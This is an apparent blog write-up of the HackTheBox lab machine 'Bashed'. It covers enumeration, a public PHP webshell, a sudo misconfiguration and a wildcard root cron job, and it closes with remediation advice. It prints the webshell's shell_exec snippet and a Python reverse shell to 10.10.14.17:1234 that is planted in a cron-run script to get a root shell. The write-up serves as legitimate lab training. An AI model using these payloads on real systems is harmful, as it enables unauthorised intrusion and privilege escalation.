HackTheBox.eu – Bashed

Bashed is a pretty simple box that was one of the first machines I tackled after I joined HTB. It helped reinforce some of the tools I had started using and general enumeration which is always a huge key in a pentest. With that lets jump into it..

Tools used:
-nmap
-gobuster
-netcat

Step 1 initial nmap enumeration running default scripts and enumerate versions saved to the nmap folder under name initial.

┌─[20:33:07]─bulbafett─[~/htb/bashed]
└──> nmap -sVC 10.10.10.68 -oA nmap/initial

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-27 20:33 EDT
Nmap scan report for 10.10.10.68
Host is up (0.076s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.21 seconds

We are given a website but no other ports in the top 1000. While loading up the site I will start a second scan to determine if any other ports are open with a quick -p- and save that as nmap/allports

┌─[20:33:55]─bulbafett─[~/htb/bashed]
└──> nmap -p- -T5 10.10.10.68 -oA nmap/allports

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-27 20:34 EDT
Warning: 10.10.10.68 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.68
Host is up (0.069s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 85.87 seconds

*for this box it didn’t end up being needed but good habit either way*

Loading up the site we are greeted with a page talking about phpbashed a useful pentesting tool that was developed on this site. Digging around we are given a link to a github where we can see the code to the phpbashed script which appears to simply be an interactive looking php webshell that uses CMD parameter to pass commands back to the server.

if (ISSET($_POST['cmd'])) {
    $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
    foreach ($output as $line) {
        echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
    }
    die();

Popping back into terminal I ran a gobuster on the site to see if I can find a version of the phpbashed script mentioned by the developer.

┌─[20:39:49]─bulbafett─[~/htb/bashed]
└──> gobuster -u http://10.10.10.68/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x php

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.68/
[+] Threads      : 200
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions   : .php
=====================================================
/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/config.php (Status: 200)
/fonts (Status: 301)
=====================================================

There are a few directories that pop out as being potentially interesting /uploads, /php and /dev browsing through these I quickly found links to bashed.php and bashed.min.php in the dev subdirectory
/dev
Loading into the script I was given a working shell as www-data.

At this point there are enough permissions to browse to the home directory where we will find the user flag at /home/arrexel/user.txt step 1 complete. Now to work on root we need to start looking at a way to escalate privileges. Doing a few basic enumeration commands I found a few things out of place. We can automate this with LinEnum.sh however I stumbled on a few things out of place before needing to run which ultimately made it not needed.

1. Checking sudo -l we can see that anyone can run any command as the user scriptmanager without a password.

www-data@bashed:/# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

2. in the root directory a folder named scripts owned by the scriptmanager user which we as www-data do not have access to view, however with the sudo -u we can see the contents

www-data@bashed:/# ls -al /
total 88
drwxr-xr-x 23 root root 4096 Dec 4 13:02 .
.....
drwxr-xr-x 2 root root 4096 Dec 4 11:18 sbin
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 18:06 scripts
drwxr-xr-x 2 root root 4096 Feb 15 2017 srv
....
lrwxrwxrwx 1 root root 29 Dec 4 11:14 vmlinuz -> boot/vmlinuz-4.4.0-62-generic

3. the scripts folder contains 2 files, one test.py is owned by scriptmanager and second test.txt is owned by root.

www-data@bashed:/# sudo -u scriptmanager ls -al /scripts
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 18:06 .
drwxr-xr-x 23 root root 4096 Dec 4 13:02 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 17:03 test.py
-rw-r--r-- 1 root root 12 Apr 28 06:34 test.txt

4. looking at the timestamps test.py was created back in December but test.txt was last accessed less than 5 mins ago which might indicate a running cron job. Running a second ls -al a few mins later confirms a change from 06:34 to 06:38. We know something is happening.

www-data@bashed:/# sudo -u scriptmanager ls -al /scripts
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 18:06 .
drwxr-xr-x 23 root root 4096 Dec 4 13:02 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 17:03 test.py
-rw-r--r-- 1 root root 12 Apr 28 06:38 test.txt

Digging deeper we can take a look at what test.py does

www-data@bashed:/# sudo -u scriptmanager ls -al /scripts
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 18:06 .
drwxr-xr-x 23 root root 4096 Dec 4 13:02 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 17:03 test.py
-rw-r--r-- 1 root root 12 Apr 27 18:55 test.txt
www-data@bashed:/# sudo -u scriptmanager cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
www-data@bashed:/$ sudo -u scriptmanager cat /scripts/test.txt
testing 123!www-data@bashed:/$

This seems to confirm that there is a cron job running, editing test.py in vim proves this

www-data@bashe0d:/$ sudo -u scriptmanager cat /scripts/test.py          
f = open("test.txt", "w")
f.write('bulba was here')
f.close()
www-data@bashed:/$ sudo -u scriptmanager cat /scripts/test.txt
bulba was herewww-data@bashed:/$ sudo -u scriptmanager ls -al /scripts/

With this we can simply update the python script to cat in /root/root.txt or we can create a root shell back to a nc listener.. lets do that. Editing the file in vim we use reverse shell from pentestmonkey cheat sheet

www-data@bashed:/# sudo -u scriptmanager cat /scripts/test.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
    s.connect(("10.10.14.17",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
    os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

line breaks added for web formatting

Wait a few mins and we should be connected…

┌─[21:10:27]─bulbafett─[~/htb/bashed]
└──> nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.68] 56310
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# python -c '
import pty; pty.spawn("/bin/bash")'
root@bashed:/#
root@bashed:~# cd /root/
root@bashed:~# ls
root.txt

With that we have the second flag and can call the box completed. But since we have root shell lets take a look at the cron jobs to see what its doing

root@bashed:~# crontab -l  
* * * * * cd /scripts; for f in *.py; do python "$f"; done

Wildcard madness! we didn’t actually need to edit test.py if we had created our own python script in the directory the job would have executed it. bad bad bad. Either way we have completed the CTF.

Now to close out as we would with a normal pentest engagement we need to recommend how to secure the box. For Bashed its actually pretty strait forward.

  • Remove the dev/phpbash.php and dev/phpbash.min.php from the box. If that’s not possible for some insane reason they need to be restricted so random Joe cannot access them.
  • SUDO -U NOPASSWD ALL is dangerous if we need to give group access it shouldn’t be blanket across the board. Typically in these scenarios one or two commands need to be run, if more than that needs to be shared usergroups are the answer requiring passwords for escalated commands. This would have stopped www-data user from being able to access the scripts folder let alone modify it.
  • Wildcards are bad. root cron wildcard jobs are worse. If the machine needs to have a root run a cron job for a normal user supplied script it should be very narrowly defined.. you are opening a giant ‘own this system window’ for that user and anyone who ends up accessing that user account. Ideally this is never the case. Expanding on that *.py on a directory should just simply NEVER be run there is absolutely no way to determine what code is being run and what it is doing. This is simply unacceptable.
  • Close